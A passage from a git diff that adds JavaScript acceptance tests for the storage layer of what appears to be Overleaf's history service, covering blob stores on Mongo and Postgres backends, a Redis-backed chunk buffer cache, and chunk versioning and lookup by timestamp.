+ await blobStore.putString(helloWorldString) + const requestedHashes = [globalBlobHash, helloWorldHash] + const blobs = await blobStore.getBlobs(requestedHashes) + const hashes = blobs.map(blob => blob.getHash()) + expect(hashes).to.have.members(requestedHashes) + }) + + it('is available through getString()', async function () { + const content = await blobStore.getString(globalBlobHash) + expect(content).to.equal('a') + }) + + it('is available through getStream()', async function () { + const stream = await blobStore.getStream(globalBlobHash) + const buffer = await streams.readStreamToBuffer(stream) + expect(buffer.toString()).to.equal(globalBlobString) + }) + + it("doesn't prevent putString() from adding the same blob", async function () { + const blob = await blobStore.putString(globalBlobString) + expect(blob.getHash()).to.equal(globalBlobHash) + const projectBlob = await scenario.backend.findBlob( + scenario.projectId, + globalBlobHash + ) + expect(projectBlob).not.to.exist + }) + + it("doesn't prevent putFile() from adding the same blob", async function () { + const dir = await mkTmpDir('blobStore') + const pathname = path.join(dir, 'blob.txt') + fs.writeFileSync(pathname, globalBlobString) + const blob = await blobStore.putFile(pathname) + expect(blob.getHash()).to.equal(globalBlobHash) + const projectBlob = await scenario.backend.findBlob( + scenario.projectId, + globalBlobHash + ) + expect(projectBlob).not.to.exist + }) + }) + + describe('a demoted global blob', function () { + it('is available through getBlob()', async function () { + const blob = await blobStore.getBlob(demotedBlobHash) + expect(blob.getHash()).to.equal(demotedBlobHash) + }) + + it('is available through getBlobs()', async function () { + await blobStore.putString(helloWorldString) + const requestedHashes = [demotedBlobHash, helloWorldHash] + const blobs = await blobStore.getBlobs(requestedHashes) + const hashes = blobs.map(blob => blob.getHash()) + expect(hashes).to.have.members(requestedHashes) + }) + + it('is available through getString()', async function () { + const content = await blobStore.getString(demotedBlobHash) + expect(content).to.equal(demotedBlobString) + }) + + it('is available through getStream()', async function () { + const stream = await blobStore.getStream(demotedBlobHash) + const buffer = await streams.readStreamToBuffer(stream) + expect(buffer.toString()).to.equal(demotedBlobString) + }) + + it("doesn't prevent putString() from creating a project blob", async function () { + const blob = await blobStore.putString(demotedBlobString) + expect(blob.getHash()).to.equal(demotedBlobHash) + const projectBlob = await scenario.backend.findBlob( + scenario.projectId, + demotedBlobHash + ) + expect(projectBlob).to.exist + }) + + it("doesn't prevent putFile() from creating a project blob", async function () { + const dir = await mkTmpDir('blobStore') + const pathname = path.join(dir, 'blob.txt') + fs.writeFileSync(pathname, demotedBlobString) + const blob = await blobStore.putFile(pathname) + expect(blob.getHash()).to.equal(demotedBlobHash) + const projectBlob = await scenario.backend.findBlob( + scenario.projectId, + demotedBlobHash + ) + expect(projectBlob).to.exist + }) + }) + + describe('deleting blobs', async function () { + beforeEach('install a project blob', async function () { + await blobStore.putString(helloWorldString) + const blob = await blobStore.getBlob(helloWorldHash) + expect(blob).to.exist + }) + + beforeEach('delete project blobs', async function () { + await blobStore.deleteBlobs() + }) + + it('deletes project blobs', async function () { + try { + await blobStore.getString(helloWorldHash) + expect.fail('expected NotFoundError') + } catch (err) { + expect(err).to.be.an.instanceof(Blob.NotFoundError) + } + }) + + it('retains global blobs', async function () { + const content = await blobStore.getString(globalBlobHash) + expect(content).to.equal(globalBlobString) + }) + }) + + describe('copyBlob method', function () { + it('copies a binary blob to another project in the same backend', async function () { + const testFile = 'graph.png' + const originalHash = testFiles.GRAPH_PNG_HASH + const insertedBlob = await blobStore.putFile(testFiles.path(testFile)) + await blobStore.copyBlob(insertedBlob, scenario.projectId2) + const copiedBlob = await blobStore2.getBlob(originalHash) + expect(copiedBlob.getHash()).to.equal(originalHash) + expect(copiedBlob.getByteLength()).to.equal( + insertedBlob.getByteLength() + ) + expect(copiedBlob.getStringLength()).to.be.null + }) + + it('copies a text blob to another project in the same backend', async function () { + const insertedBlob = await blobStore.putString(helloWorldString) + await blobStore.copyBlob(insertedBlob, scenario.projectId2) + const copiedBlob = await blobStore2.getBlob(helloWorldHash) + expect(copiedBlob.getHash()).to.equal(helloWorldHash) + const content = await blobStore2.getString(helloWorldHash) + expect(content).to.equal(helloWorldString) + }) + }) + + describe('copyBlob method with different backends', function () { + const otherScenario = scenarios.find( + s => s.backend !== scenario.backend + ) + const otherBlobStore = new BlobStore(otherScenario.projectId2) + + beforeEach(async function () { + await otherBlobStore.initialize() + }) + + it('copies a binary blob to another project in a different backend', async function () { + const testFile = 'graph.png' + const originalHash = testFiles.GRAPH_PNG_HASH + const insertedBlob = await blobStore.putFile(testFiles.path(testFile)) + await blobStore.copyBlob(insertedBlob, otherScenario.projectId2) + const copiedBlob = await otherBlobStore.getBlob(originalHash) + expect(copiedBlob).to.exist + expect(copiedBlob.getHash()).to.equal(originalHash) + expect(copiedBlob.getByteLength()).to.equal( + insertedBlob.getByteLength() + ) + expect(copiedBlob.getStringLength()).to.be.null + }) + + it('copies a text blob to another project in a different backend', async function () { + const insertedBlob = await blobStore.putString(helloWorldString) + await blobStore.copyBlob(insertedBlob, otherScenario.projectId2) + const copiedBlob = await otherBlobStore.getBlob(helloWorldHash) + expect(copiedBlob).to.exist + expect(copiedBlob.getHash()).to.equal(helloWorldHash) + const content = await otherBlobStore.getString(helloWorldHash) + expect(content).to.equal(helloWorldString) + }) + }) + }) + } + + it('getProjectBlobsBatch() with mixed projects', async function () { + for (const scenario of scenarios) { + const blobStore = new BlobStore(scenario.projectId) + const blobStore2 = new BlobStore(scenario.projectId2) + await blobStore.initialize() + await blobStore.putString(helloWorldString) + await blobStore2.initialize() + await blobStore2.putFile(testFiles.path('graph.png')) + } + + const projects = [ + parseInt(scenarios[0].projectId, 10), + scenarios[1].projectId, + parseInt(scenarios[0].projectId2, 10), + scenarios[1].projectId2, + ] + const { nBlobs, blobs } = await getProjectBlobsBatch(projects) + expect(nBlobs).to.equal(4) + expect(Object.fromEntries(blobs.entries())).to.deep.equal({ + [scenarios[0].projectId]: [new Blob(helloWorldHash, 11, 11)], + [scenarios[1].projectId]: [new Blob(helloWorldHash, 11, 11)], + [scenarios[0].projectId2]: [ + new Blob( + testFiles.GRAPH_PNG_HASH, + testFiles.GRAPH_PNG_BYTE_LENGTH, + null + ), + ], + [scenarios[1].projectId2]: [ + new Blob( + testFiles.GRAPH_PNG_HASH, + testFiles.GRAPH_PNG_BYTE_LENGTH, + null + ), + ], + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/blob_store_mongo.test.js b/services/history-v1/test/acceptance/js/storage/blob_store_mongo.test.js new file mode 100644 index 0000000..3198278 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/blob_store_mongo.test.js @@ -0,0 +1,172 @@ +const { expect } = require('chai') +const { ObjectId, Binary } = require('mongodb') +const { Blob } = require('overleaf-editor-core') +const cleanup = require('./support/cleanup') +const mongoBackend = require('../../../../storage/lib/blob_store/mongo') +const mongodb = require('../../../../storage/lib/mongodb') + +describe('BlobStore Mongo backend', function () { + const projectId = new ObjectId().toString() + const hashes = { + abcd: [ + 'abcd000000000000000000000000000000000000', + 'abcd111111111111111111111111111111111111', + 'abcd222222222222222222222222222222222222', + 'abcd333333333333333333333333333333333333', + 'abcd444444444444444444444444444444444444', + 'abcd555555555555555555555555555555555555', + 'abcd666666666666666666666666666666666666', + 'abcd777777777777777777777777777777777777', + 'abcd888888888888888888888888888888888888', + 'abcd999999999999999999999999999999999999', + 'abcdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa', + ], + 1234: ['1234000000000000000000000000000000000000'], + 1337: ['1337000000000000000000000000000000000000'], + } + + beforeEach('clean up', cleanup.everything) + + beforeEach('initialize the project', async function () { + await mongoBackend.initialize(projectId) + }) + + describe('insertBlob', function () { + it('writes blobs to the projectHistoryBlobs collection', async function () { + for (const hash of hashes.abcd + .slice(0, 2) + .concat(hashes[1234].slice(0, 1))) { + const blob = new Blob(hash, 123, 99) + await mongoBackend.insertBlob(projectId, blob) + } + const record = await mongodb.blobs.findOne(new ObjectId(projectId), { + promoteBuffers: true, + }) + expect(record.blobs).to.deep.equal({ + abc: hashes.abcd.slice(0, 2).map(hash => ({ + h: Buffer.from(hash, 'hex'), + b: 123, + s: 99, + })), + 123: [{ h: Buffer.from(hashes[1234][0], 'hex'), b: 123, s: 99 }], + }) + }) + + it('writes excess blobs to the projectHistoryShardedBlobs collection', async function () { + for (const hash of hashes.abcd.concat(hashes[1234])) { + const blob = new Blob(hash, 123, 99) + await mongoBackend.insertBlob(projectId, blob) + } + const record = await mongodb.blobs.findOne(new ObjectId(projectId), { + promoteBuffers: true, + }) + expect(record.blobs).to.deep.equal({ + abc: hashes.abcd + .slice(0, 8) + .map(hash => ({ h: Buffer.from(hash, 'hex'), b: 123, s: 99 })), + 123: [{ h: Buffer.from(hashes[1234][0], 'hex'), b: 123, s: 99 }], + }) + const shardedRecord = await mongodb.shardedBlobs.findOne( + { _id: new Binary(Buffer.from(`${projectId}0a`, 'hex')) }, + { promoteBuffers: true } + ) + expect(shardedRecord.blobs).to.deep.equal({ + bcd: hashes.abcd + .slice(8) + .map(hash => ({ h: Buffer.from(hash, 'hex'), b: 123, s: 99 })), + }) + }) + }) + + describe('getProjectBlobsBatch', function () { + it('finds all the blobs', async function () { + const projectId0 = new ObjectId().toString() + const hashesProject0 = hashes[1234].concat(hashes.abcd) + const projectId1 = new ObjectId().toString() + const hashesProject1 = hashes[1337].concat(hashes.abcd) + const projectId2 = new ObjectId().toString() + const hashesProject2 = [] // no hashes + const projectId3 = new ObjectId().toString() + const hashesProject3 = hashes[1337] + const projectBlobs = { + [projectId0]: hashesProject0, + [projectId1]: hashesProject1, + [projectId2]: hashesProject2, + [projectId3]: hashesProject3, + } + for (const [projectId, hashes] of Object.entries(projectBlobs)) { + for (const hash of hashes) { + const blob = new Blob(hash, 123, 99) + await mongoBackend.insertBlob(projectId, blob) + } + } + const projects = [projectId0, projectId1, projectId2, projectId3] + const { nBlobs, blobs } = + await mongoBackend.getProjectBlobsBatch(projects) + expect(nBlobs).to.equal( + hashesProject0.length + hashesProject1.length + hashesProject3.length + ) + expect(Object.fromEntries(blobs.entries())).to.deep.equal({ + [projectId0]: hashesProject0.map(hash => new Blob(hash, 123, 99)), + [projectId1]: hashesProject1.map(hash => new Blob(hash, 123, 99)), + [projectId3]: hashesProject3.map(hash => new Blob(hash, 123, 99)), + }) + }) + }) + + describe('with existing blobs', function () { + beforeEach(async function () { + for (const hash of hashes.abcd.concat(hashes[1234])) { + const blob = new Blob(hash, 123, 99) + await mongoBackend.insertBlob(projectId, blob) + } + }) + + describe('findBlob', function () { + it('finds blobs in the projectHistoryBlobs collection', async function () { + const blob = await mongoBackend.findBlob(projectId, hashes.abcd[0]) + expect(blob.getHash()).to.equal(hashes.abcd[0]) + }) + + it('finds blobs in the projectHistoryShardedBlobs collection', async function () { + const blob = await mongoBackend.findBlob(projectId, hashes.abcd[9]) + expect(blob.getHash()).to.equal(hashes.abcd[9]) + }) + }) + + describe('findBlobs', function () { + it('finds blobs in the projectHistoryBlobs collection', async function () { + const requestedHashes = hashes.abcd.slice(0, 3).concat(hashes[1234]) + const blobs = await mongoBackend.findBlobs(projectId, requestedHashes) + const obtainedHashes = blobs.map(blob => blob.getHash()) + expect(obtainedHashes).to.have.members(requestedHashes) + }) + + it('finds blobs in the projectHistoryShardedBlobs collection', async function () { + const requestedHashes = [1, 3, 5, 8, 9].map(idx => hashes.abcd[idx]) + const blobs = await mongoBackend.findBlobs(projectId, requestedHashes) + const obtainedHashes = blobs.map(blob => blob.getHash()) + expect(obtainedHashes).to.have.members(requestedHashes) + }) + }) + + describe('getProjectBlobs', function () { + it('returns all blobs for a given project', async function () { + const blobs = await mongoBackend.getProjectBlobs(projectId) + const obtainedHashes = blobs.map(blob => blob.getHash()) + const expectedHashes = hashes.abcd.concat(hashes[1234]) + expect(obtainedHashes).to.have.members(expectedHashes) + }) + }) + + describe('deleteBlobs', function () { + it('deletes all blobs for a given project', async function () { + await mongoBackend.deleteBlobs(projectId) + const recordCount = await mongodb.blobs.count() + const shardedRecordCount = await mongodb.shardedBlobs.count() + expect(recordCount).to.equal(0) + expect(shardedRecordCount).to.equal(0) + }) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/blob_store_postgres.test.js b/services/history-v1/test/acceptance/js/storage/blob_store_postgres.test.js new file mode 100644 index 0000000..e762c33 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/blob_store_postgres.test.js @@ -0,0 +1,42 @@ +const postgresBackend = require('../../../../storage/lib/blob_store/postgres') +const { ObjectId } = require('mongodb') +const { expect } = require('chai') + +describe('BlobStore postgres backend', function () { + describe('projectId validation', function () { + it('insertBlob rejects when called with bad projectId', async function () { + const projectId = new ObjectId().toString() + await expect( + postgresBackend.insertBlob(projectId, 'hash', 123, 99) + ).to.be.rejectedWith('bad projectId') + }) + + it('deleteBlobs rejects when called with bad projectId', async function () { + const projectId = new ObjectId().toString() + await expect(postgresBackend.deleteBlobs(projectId)).to.be.rejectedWith( + 'bad projectId' + ) + }) + + it('findBlobs rejects when called with bad projectId', async function () { + const projectId = new ObjectId().toString() + await expect(postgresBackend.findBlobs(projectId)).to.be.rejectedWith( + 'bad projectId' + ) + }) + + it('findBlob rejects when called with bad projectId', async function () { + const projectId = new ObjectId().toString() + await expect( + postgresBackend.findBlob(projectId, 'hash') + ).to.be.rejectedWith('bad projectId') + }) + + it('getProjectBlobs rejects when called with bad projectId', async function () { + const projectId = new ObjectId().toString() + await expect( + postgresBackend.getProjectBlobs(projectId) + ).to.be.rejectedWith('bad projectId') + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/chunk_buffer.test.js b/services/history-v1/test/acceptance/js/storage/chunk_buffer.test.js new file mode 100644 index 0000000..bfd979d --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/chunk_buffer.test.js @@ -0,0 +1,210 @@ +'use strict' + +const { expect } = require('chai') +const sinon = require('sinon') +const { + Chunk, + Snapshot, + History, + File, + AddFileOperation, + Change, +} = require('overleaf-editor-core') +const cleanup = require('./support/cleanup') +const fixtures = require('./support/fixtures') +const chunkBuffer = require('../../../../storage/lib/chunk_buffer') +const chunkStore = require('../../../../storage/lib/chunk_store') +const redisBackend = require('../../../../storage/lib/chunk_store/redis') +const metrics = require('@overleaf/metrics') + +describe('chunk buffer', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + beforeEach(function () { + sinon.spy(metrics, 'inc') + }) + afterEach(function () { + metrics.inc.restore() + }) + + const projectId = '123456' + + describe('loadLatest', function () { + // Initialize project and create a test chunk + beforeEach(async function () { + // Initialize project in chunk store + await chunkStore.initializeProject(projectId) + }) + + describe('with an existing chunk', function () { + beforeEach(async function () { + // Create a sample chunk with some content + const snapshot = new Snapshot() + const changes = [ + new Change( + [new AddFileOperation('test.tex', File.fromString('Hello World'))], + new Date(), + [] + ), + ] + const history = new History(snapshot, changes) + const chunk = new Chunk(history, 1) // startVersion 1 + + // Store the chunk directly in the chunk store using create method + // which internally calls uploadChunk + await chunkStore.create(projectId, chunk) + + // Clear any existing cache + await redisBackend.clearCache(projectId) + }) + + it('should load from chunk store and update cache on first access (cache miss)', async function () { + // First access should load from chunk store and populate cache + const firstResult = await chunkBuffer.loadLatest(projectId) + + // Verify the chunk is correct + expect(firstResult).to.not.be.null + expect(firstResult.getStartVersion()).to.equal(1) + expect(firstResult.getEndVersion()).to.equal(2) + + // Verify that we got a cache miss metric + expect( + metrics.inc.calledWith('chunk_buffer.loadLatest', 1, { + status: 'cache-miss', + }) + ).to.be.true + + // Reset the metrics spy + metrics.inc.resetHistory() + + // Second access should hit the cache + const secondResult = await chunkBuffer.loadLatest(projectId) + + // Verify we got the same chunk + expect(secondResult).to.not.be.null + expect(secondResult.getStartVersion()).to.equal(1) + expect(secondResult.getEndVersion()).to.equal(2) + + // Verify that we got a cache hit metric + expect( + metrics.inc.calledWith('chunk_buffer.loadLatest', 1, { + status: 'cache-hit', + }) + ).to.be.true + + // Verify both chunks are equivalent + expect(secondResult.getStartVersion()).to.equal( + firstResult.getStartVersion() + ) + expect(secondResult.getEndVersion()).to.equal( + firstResult.getEndVersion() + ) + }) + + it('should refresh the cache when chunk changes in the store', async function () { + // First access to load into cache + const firstResult = await chunkBuffer.loadLatest(projectId) + expect(firstResult.getStartVersion()).to.equal(1) + + // Reset metrics spy + metrics.inc.resetHistory() + + // Create a new chunk with different content + const newSnapshot = new Snapshot() + const newChanges = [ + new Change( + [ + new AddFileOperation( + 'updated.tex', + File.fromString('Updated content') + ), + ], + new Date(), + [] + ), + ] + const newHistory = new History(newSnapshot, newChanges) + const newChunk = new Chunk(newHistory, 2) // Different start version + + // Store the new chunk directly in the chunk store + await chunkStore.create(projectId, newChunk) + + // Access again - should detect the change and refresh cache + const secondResult = await chunkBuffer.loadLatest(projectId) + + // Verify we got the updated chunk + expect(secondResult.getStartVersion()).to.equal(2) + expect(secondResult.getEndVersion()).to.equal(3) + + // Verify that we got a cache miss metric (since the cached chunk was invalidated) + expect( + metrics.inc.calledWith('chunk_buffer.loadLatest', 1, { + status: 'cache-miss', + }) + ).to.be.true + }) + + it('should continue using cache when chunk in store has not changed', async function () { + // First access to load into cache + await chunkBuffer.loadLatest(projectId) + + // Reset metrics spy + metrics.inc.resetHistory() + + // Access again without changing the underlying chunk + const result = await chunkBuffer.loadLatest(projectId) + + // Verify we got the same chunk + expect(result.getStartVersion()).to.equal(1) + expect(result.getEndVersion()).to.equal(2) + + // Verify that we got a cache hit metric + expect( + metrics.inc.calledWith('chunk_buffer.loadLatest', 1, { + status: 'cache-hit', + }) + ).to.be.true + }) + }) + + describe('with an empty project', function () { + it('should handle a case with empty chunks (no changes)', async function () { + // Clear the cache + await redisBackend.clearCache(projectId) + + // Load the initial empty chunk via buffer + const result = await chunkBuffer.loadLatest(projectId) + + // Verify we got the empty chunk + expect(result.getStartVersion()).to.equal(0) + expect(result.getEndVersion()).to.equal(0) // Start equals end for empty chunks + expect(result.history.changes.length).to.equal(0) + + // Verify cache miss metric + expect( + metrics.inc.calledWith('chunk_buffer.loadLatest', 1, { + status: 'cache-miss', + }) + ).to.be.true + + // Reset metrics + metrics.inc.resetHistory() + + // Second access should hit the cache + const secondResult = await chunkBuffer.loadLatest(projectId) + + // Verify we got the same empty chunk + expect(secondResult.getStartVersion()).to.equal(0) + expect(secondResult.getEndVersion()).to.equal(0) + expect(secondResult.history.changes.length).to.equal(0) + + // Verify cache hit metric + expect( + metrics.inc.calledWith('chunk_buffer.loadLatest', 1, { + status: 'cache-hit', + }) + ).to.be.true + }) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/chunk_store.test.js b/services/history-v1/test/acceptance/js/storage/chunk_store.test.js new file mode 100644 index 0000000..50341fd --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/chunk_store.test.js @@ -0,0 +1,544 @@ +'use strict' + +const cleanup = require('./support/cleanup') +const fixtures = require('./support/fixtures') +const { expect } = require('chai') +const sinon = require('sinon') +const { ObjectId } = require('mongodb') +const { projects } = require('../../../../storage/lib/mongodb') + +const { + Chunk, + Snapshot, + Change, + History, + File, + Operation, + AddFileOperation, + EditFileOperation, + TextOperation, +} = require('overleaf-editor-core') +const { chunkStore, historyStore } = require('../../../../storage') + +describe('chunkStore', function () { + beforeEach(cleanup.everything) + beforeEach(fixtures.create) + + const scenarios = [ + { + description: 'Postgres backend', + createProject: chunkStore.initializeProject, + idMapping: id => parseInt(id, 10), + }, + { + description: 'Mongo backend', + createProject: () => + chunkStore.initializeProject(new ObjectId().toString()), + idMapping: id => id, + }, + ] + + for (const scenario of scenarios) { + describe(scenario.description, function () { + let projectId + let projectRecord + + beforeEach(async function () { + projectId = await scenario.createProject() + // create a record in the mongo projects collection + projectRecord = await projects.insertOne({ + overleaf: { history: { id: scenario.idMapping(projectId) } }, + }) + }) + + it('loads empty latest chunk for a new project', async function () { + const chunk = await chunkStore.loadLatest(projectId) + expect(chunk.getSnapshot().countFiles()).to.equal(0) + expect(chunk.getChanges().length).to.equal(0) + expect(chunk.getEndTimestamp()).not.to.exist + }) + + describe('creating a chunk', async function () { + const pendingChangeTimestamp = new Date('2014-01-01T00:00:00') + const lastChangeTimestamp = new Date('2015-01-01T00:00:00') + beforeEach(async function () { + const chunk = makeChunk( + [ + makeChange( + Operation.addFile('main.tex', File.fromString('abc')), + lastChangeTimestamp + ), + ], + 1 + ) + await chunkStore.create(projectId, chunk, pendingChangeTimestamp) + }) + it('creates a chunk and inserts the pending change timestamp', async function () { + const project = await projects.findOne({ + _id: new ObjectId(projectRecord.insertedId), + }) + expect(project.overleaf.history.currentEndVersion).to.equal(2) + expect(project.overleaf.history.currentEndTimestamp).to.deep.equal( + lastChangeTimestamp + ) + expect(project.overleaf.backup.pendingChangeAt).to.deep.equal( + pendingChangeTimestamp + ) + }) + }) + + describe('adding and editing a blank file', function () { + const testPathname = 'foo.txt' + const testTextOperation = TextOperation.fromJSON({ + textOperation: ['a'], + }) // insert an a + let lastChangeTimestamp + const pendingChangeTimestamp = new Date() + + beforeEach(async function () { + const chunk = await chunkStore.loadLatest(projectId) + const oldEndVersion = chunk.getEndVersion() + const changes = [ + makeChange(Operation.addFile(testPathname, File.fromString(''))), + makeChange(Operation.editFile(testPathname, testTextOperation)), + ] + lastChangeTimestamp = changes[1].getTimestamp() + chunk.pushChanges(changes) + await chunkStore.update( + projectId, + oldEndVersion, + chunk, + pendingChangeTimestamp + ) + }) + + it('records the correct metadata in db readOnly=false', async function () { + const raw = await chunkStore.loadLatestRaw(projectId) + expect(raw).to.deep.include({ + startVersion: 0, + endVersion: 2, + endTimestamp: lastChangeTimestamp, + }) + }) + + it('records the correct metadata in db readOnly=true', async function () { + const raw = await chunkStore.loadLatestRaw(projectId, { + readOnly: true, + }) + expect(raw).to.deep.include({ + startVersion: 0, + endVersion: 2, + endTimestamp: lastChangeTimestamp, + }) + }) + + it('records the correct timestamp', async function () { + const chunk = await chunkStore.loadLatest(projectId) + expect(chunk.getEndTimestamp()).to.deep.equal(lastChangeTimestamp) + }) + + it('records changes', async function () { + const chunk = await chunkStore.loadLatest(projectId) + const history = chunk.getHistory() + expect(history.getSnapshot().countFiles()).to.equal(0) + expect(history.getChanges().length).to.equal(2) + const addChange = history.getChanges()[0] + expect(addChange.getOperations().length).to.equal(1) + const addFile = addChange.getOperations()[0] + expect(addFile).to.be.an.instanceof(AddFileOperation) + expect(addFile.getPathname()).to.equal(testPathname) + const file = addFile.getFile() + expect(file.getHash()).to.equal(File.EMPTY_FILE_HASH) + expect(file.getByteLength()).to.equal(0) + expect(file.getStringLength()).to.equal(0) + const editChange = history.getChanges()[1] + expect(editChange.getOperations().length).to.equal(1) + const editFile = editChange.getOperations()[0] + expect(editFile).to.be.an.instanceof(EditFileOperation) + expect(editFile.getPathname()).to.equal(testPathname) + }) + + it('updates the project record with the current version and timestamps', async function () { + const project = await projects.findOne({ + _id: new ObjectId(projectRecord.insertedId), + }) + expect(project.overleaf.history.currentEndVersion).to.equal(2) + expect(project.overleaf.history.currentEndTimestamp).to.deep.equal( + lastChangeTimestamp + ) + expect(project.overleaf.backup.pendingChangeAt).to.deep.equal( + pendingChangeTimestamp + ) + }) + }) + + describe('multiple chunks', async function () { + // Two chunks are 1 year apart + const pendingChangeTimestamp = new Date('2014-01-01T00:00:00') + const firstChunkTimestamp = new Date('2015-01-01T00:00:00') + const secondChunkTimestamp = new Date('2016-01-01T00:00:00') + const thirdChunkTimestamp = new Date('2017-01-01T00:00:00') + let firstChunk, secondChunk, thirdChunk + + beforeEach(async function () { + firstChunk = makeChunk( + [ + makeChange( + Operation.addFile('foo.tex', File.fromString('')), + new Date(firstChunkTimestamp - 5000) + ), + makeChange( + Operation.addFile('bar.tex', File.fromString('')), + firstChunkTimestamp + ), + ], + 0 + ) + await chunkStore.update( + projectId, + 0, + firstChunk, + pendingChangeTimestamp + ) + firstChunk = await chunkStore.loadLatest(projectId) + + secondChunk = makeChunk( + [ + makeChange( + Operation.addFile('baz.tex', File.fromString('')), + new Date(secondChunkTimestamp - 5000) + ), + makeChange( + Operation.addFile('qux.tex', File.fromString('')), + secondChunkTimestamp + ), + ], + 2 + ) + await chunkStore.create(projectId, secondChunk) + secondChunk = await chunkStore.loadLatest(projectId) + + thirdChunk = makeChunk( + [ + makeChange( + Operation.addFile('quux.tex', File.fromString('')), + thirdChunkTimestamp + ), + ], + 4 + ) + await chunkStore.create(projectId, thirdChunk) + thirdChunk = await chunkStore.loadLatest(projectId) + }) + + it('returns the second chunk when querying for a version between the start and end version', async function () { + const chunk = await chunkStore.loadAtVersion(projectId, 3) + expect(chunk).to.deep.equal(secondChunk) + + // Check file lazy loading + const history = chunk.getHistory() + expect(history.getSnapshot().countFiles()).to.equal(0) + expect(history.getChanges().length).to.equal(2) + + const change = history.getChanges()[0] + expect(change.getOperations().length).to.equal(1) + + const addFile = change.getOperations()[0] + expect(addFile).to.be.an.instanceof(AddFileOperation) + expect(addFile.getPathname()).to.equal('baz.tex') + + const file = addFile.getFile() + expect(file.getHash()).to.equal(File.EMPTY_FILE_HASH) + expect(file.getByteLength()).to.equal(0) + expect(file.getStringLength()).to.equal(0) + }) + + it('returns the first chunk when querying for the end version of the chunk', async function () { + const chunk = await chunkStore.loadAtVersion(projectId, 2) + expect(chunk).to.deep.equal(firstChunk) + }) + + it('returns the second chunk when querying for a timestamp between the second and third chunk', async function () { + const searchTimestamp = new Date('2015-07-01T00:00:00') + const chunk = await chunkStore.loadAtTimestamp( + projectId, + searchTimestamp + ) + expect(chunk).to.deep.equal(secondChunk) + + // Check file lazy loading + const history = chunk.getHistory() + expect(history.getSnapshot().countFiles()).to.equal(0) + expect(history.getChanges().length).to.equal(2) + + const change = history.getChanges()[0] + expect(change.getOperations().length).to.equal(1) + + const addFile = change.getOperations()[0] + expect(addFile).to.be.an.instanceof(AddFileOperation) + expect(addFile.getPathname()).to.equal('baz.tex') + + const file = addFile.getFile() + expect(file.getHash()).to.equal(File.EMPTY_FILE_HASH) + expect(file.getByteLength()).to.equal(0) + expect(file.getStringLength()).to.equal(0) + }) + + it('returns the third chunk when querying for a timestamp past the latest chunk', async function () { + const searchTimestampPastLatestChunk = new Date('2018-01-01T00:00:00') + const chunk = await chunkStore.loadAtTimestamp( + projectId, + searchTimestampPastLatestChunk + ) + // Check that we found the third chunk + expect(chunk).to.deep.equal(thirdChunk) + }) + + it('updates the project record to match the last chunk', async function () { + const project = await projects.findOne({ + _id: new ObjectId(projectRecord.insertedId), + }) + expect(project.overleaf.history.currentEndVersion).to.equal(5) + expect(project.overleaf.history.currentEndTimestamp).to.deep.equal( + thirdChunkTimestamp + ) + }) + + it('updates the pending change timestamp to match the first chunk', async function () { + const project = await projects.findOne({ + _id: new ObjectId(projectRecord.insertedId), + }) + expect(project.overleaf.backup.pendingChangeAt).to.deep.equal( + pendingChangeTimestamp + ) + }) + + describe('after updating the last chunk', function () { + let newChunk + + beforeEach(async function () { + newChunk = makeChunk( + [ + ...thirdChunk.getChanges(), + makeChange( + Operation.addFile('onemore.tex', File.fromString('')), + thirdChunkTimestamp + ), + ], + 4 + ) + await chunkStore.update(projectId, 5, newChunk) + newChunk = await chunkStore.loadLatest(projectId) + }) + + it('replaces the latest chunk', function () { + expect(newChunk.getChanges()).to.have.length(2) + }) + + it('returns the right chunk when querying by version', async function () { + const chunk = await chunkStore.loadAtVersion(projectId, 5) + expect(chunk).to.deep.equal(newChunk) + }) + + it('returns the right chunk when querying by timestamp', async function () { + const chunk = await chunkStore.loadAtTimestamp( + projectId, + thirdChunkTimestamp + ) + expect(chunk).to.deep.equal(newChunk) + }) + + it('updates the project record to match the latest version and timestamp', async function () { + const project = await projects.findOne({ + _id: new ObjectId(projectRecord.insertedId), + }) + expect(project.overleaf.history.currentEndVersion).to.equal(6) + expect(project.overleaf.history.currentEndTimestamp).to.deep.equal( + thirdChunkTimestamp + ) + }) + + it('does not modify the existing pending change timestamp in the project record', async function () { + const project = await projects.findOne({ + _id: new ObjectId(projectRecord.insertedId), + }) + expect(project.overleaf.backup.pendingChangeAt).to.deep.equal( + pendingChangeTimestamp + ) + }) + }) + + describe('when iterating the chunks with getProjectChunksFromVersion', function () { + // The first chunk has startVersion:0 and endVersion:2 + for (let startVersion = 0; startVersion <= 2; startVersion++) { + it(`returns all chunk records when starting from version ${startVersion}`, async function () { + const chunkRecords = [] + for await (const chunk of chunkStore.getProjectChunksFromVersion( + projectId, + startVersion + )) { + chunkRecords.push(chunk) + } + const expectedChunks = [firstChunk, secondChunk, thirdChunk] + expect(chunkRecords).to.have.length(expectedChunks.length) + chunkRecords.forEach((chunkRecord, index) => { + expect(chunkRecord.startVersion).to.deep.equal( + expectedChunks[index].getStartVersion() + ) + expect(chunkRecord.endVersion).to.deep.equal( + expectedChunks[index].getEndVersion() + ) + }) + }) + } + + // The second chunk has startVersion:2 and endVersion:4 + for (let startVersion = 3; startVersion <= 4; startVersion++) { + it(`returns two chunk records when starting from version ${startVersion}`, async function () { + const chunkRecords = [] + for await (const chunk of chunkStore.getProjectChunksFromVersion( + projectId, + startVersion + )) { + chunkRecords.push(chunk) + } + const expectedChunks = [secondChunk, thirdChunk] + expect(chunkRecords).to.have.length(expectedChunks.length) + chunkRecords.forEach((chunkRecord, index) => { + expect(chunkRecord.startVersion).to.deep.equal( + expectedChunks[index].getStartVersion() + ) + expect(chunkRecord.endVersion).to.deep.equal( + expectedChunks[index].getEndVersion() + ) + }) + }) + } + + // The third chunk has startVersion:4 and endVersion:5 + for (let startVersion = 5; startVersion <= 5; startVersion++) { + it(`returns one chunk record when starting from version ${startVersion}`, async function () { + const chunkRecords = [] + for await (const chunk of chunkStore.getProjectChunksFromVersion( + projectId, + startVersion + )) { + chunkRecords.push(chunk) + } + const expectedChunks = [thirdChunk] + expect(chunkRecords).to.have.length(expectedChunks.length) + 